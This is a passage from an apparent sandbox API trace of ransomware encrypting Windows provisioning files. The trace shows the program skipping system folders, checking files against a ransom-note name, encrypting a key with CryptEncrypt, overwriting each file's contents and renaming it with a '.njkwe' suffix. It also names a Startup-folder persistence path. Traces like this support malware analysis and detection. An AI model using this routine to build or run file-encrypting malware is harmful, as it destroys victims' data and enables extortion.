[0077.000] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.000] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9013ce1d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9013ce1d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9013ce1d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml", cAlternateFileName="15__CO~1.PRO")) returned 1 [0077.000] lstrcmpiW (lpString1="15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.000] lstrcmpiW (lpString1="15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.000] lstrcmpiW (lpString1="15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.000] lstrcmpiW (lpString1="15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.000] lstrcmpiW (lpString1="15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.000] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml") returned 160 [0077.000] StrStrIW (lpFirst="15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.000] lstrcmpW (lpString1="15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.000] lstrcmpW (lpString1="15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.000] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\15__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.000] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\15__connections_cellular_optus (australia)_i6$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.001] GetTickCount () returned 0x115396b [0077.001] GetTickCount () returned 0x115396b [0077.001] GetTickCount () returned 0x115396b [0077.001] GetTickCount () returned 0x115396b [0077.001] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.001] GetProcessHeap () returned 0xbe0000 [0077.001] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.001] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0077.003] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.003] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0077.003] GetProcessHeap () returned 0xbe0000 [0077.003] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.003] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.003] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.003] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.003] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.003] CloseHandle (hObject=0x43c) returned 1 [0077.003] GetProcessHeap () returned 0xbe0000 [0077.004] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.004] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0077.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\15__connections_cellular_optus (australia)_i6$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\15__Connections_Cellular_Optus (Australia)_i6$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\15__connections_cellular_optus (australia)_i6$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.004] GetProcessHeap () returned 0xbe0000 [0077.004] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.004] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90627dfd, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90627dfd, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90627dfd, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml", cAlternateFileName="160__C~1.PRO")) returned 1 [0077.004] lstrcmpiW (lpString1="160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.004] lstrcmpiW (lpString1="160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.004] lstrcmpiW (lpString1="160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.004] lstrcmpiW (lpString1="160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.004] lstrcmpiW (lpString1="160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.004] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml") returned 168 [0077.004] StrStrIW (lpFirst="160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.004] lstrcmpW (lpString1="160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.004] lstrcmpW (lpString1="160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.005] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\160__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.005] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\160__connections_cellular_telestet (stet) (greece)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.005] GetTickCount () returned 0x115396b [0077.005] GetTickCount () returned 0x115396b [0077.005] GetTickCount () returned 0x115396b [0077.005] GetTickCount () returned 0x115396b [0077.005] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.005] GetProcessHeap () returned 0xbe0000 [0077.005] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.005] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0077.006] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.006] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0077.007] GetProcessHeap () returned 0xbe0000 [0077.007] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.007] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.007] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.007] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.007] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.007] CloseHandle (hObject=0x43c) returned 1 [0077.007] GetProcessHeap () returned 0xbe0000 [0077.007] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.007] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0077.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\160__connections_cellular_telestet (stet) (greece)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\160__Connections_Cellular_Telestet (STET) (Greece)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\160__connections_cellular_telestet (stet) (greece)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.008] GetProcessHeap () returned 0xbe0000 [0077.008] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.008] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90627dfd, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90627dfd, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90627dfd, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2da, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml", cAlternateFileName="161__C~1.PRO")) returned 1 [0077.012] lstrcmpiW (lpString1="161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.012] lstrcmpiW (lpString1="161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.012] lstrcmpiW (lpString1="161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.012] lstrcmpiW (lpString1="161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.012] lstrcmpiW (lpString1="161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.012] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml") returned 168 [0077.012] StrStrIW (lpFirst="161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.012] lstrcmpW (lpString1="161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.012] lstrcmpW (lpString1="161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.012] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\161__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.012] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\161__connections_cellular_vodafone greece (greece)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.012] GetTickCount () returned 0x115396b [0077.012] GetTickCount () returned 0x115396b [0077.012] GetTickCount () returned 0x115396b [0077.012] GetTickCount () returned 0x115396b [0077.012] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.012] GetProcessHeap () returned 0xbe0000 [0077.012] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.012] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2da, lpOverlapped=0x0) returned 1 [0077.014] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.014] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2da, lpOverlapped=0x0) returned 1 [0077.014] GetProcessHeap () returned 0xbe0000 [0077.014] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.014] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.014] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.014] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.014] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.015] CloseHandle (hObject=0x43c) returned 1 [0077.015] GetProcessHeap () returned 0xbe0000 [0077.015] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.015] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0077.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\161__connections_cellular_vodafone greece (greece)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\161__Connections_Cellular_Vodafone Greece (Greece)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\161__connections_cellular_vodafone greece (greece)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.015] GetProcessHeap () returned 0xbe0000 [0077.016] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.016] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9064e061, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9064e061, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9064e061, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2df, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml", cAlternateFileName="162__C~1.PRO")) returned 1 [0077.016] lstrcmpiW (lpString1="162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.016] lstrcmpiW (lpString1="162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.016] lstrcmpiW (lpString1="162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.016] lstrcmpiW (lpString1="162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.016] lstrcmpiW (lpString1="162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.016] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml") returned 168 [0077.016] StrStrIW (lpFirst="162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.016] lstrcmpW (lpString1="162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.016] lstrcmpW (lpString1="162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.016] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\162__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.016] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\162__Connections_Cellular_Vodafone Greece (Greece)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\162__connections_cellular_vodafone greece (greece)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.016] GetTickCount () returned 0x115397b [0077.016] GetTickCount () returned 0x115397b [0077.016] GetTickCount () returned 0x115397b [0077.016] GetTickCount () returned 0x115397b [0077.016] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.016] GetProcessHeap () returned 0xbe0000 [0077.016] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.017] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2df, lpOverlapped=0x0) returned 1 [0077.027] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.027] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2df, lpOverlapped=0x0) returned 1 [0077.027] GetProcessHeap () returned 0xbe0000 [0077.027] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.027] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.028] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.028] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.028] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.028] CloseHandle (hObject=0x43c) returned 1 [0077.028] GetProcessHeap () returned 0xbe0000 [0077.028] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, 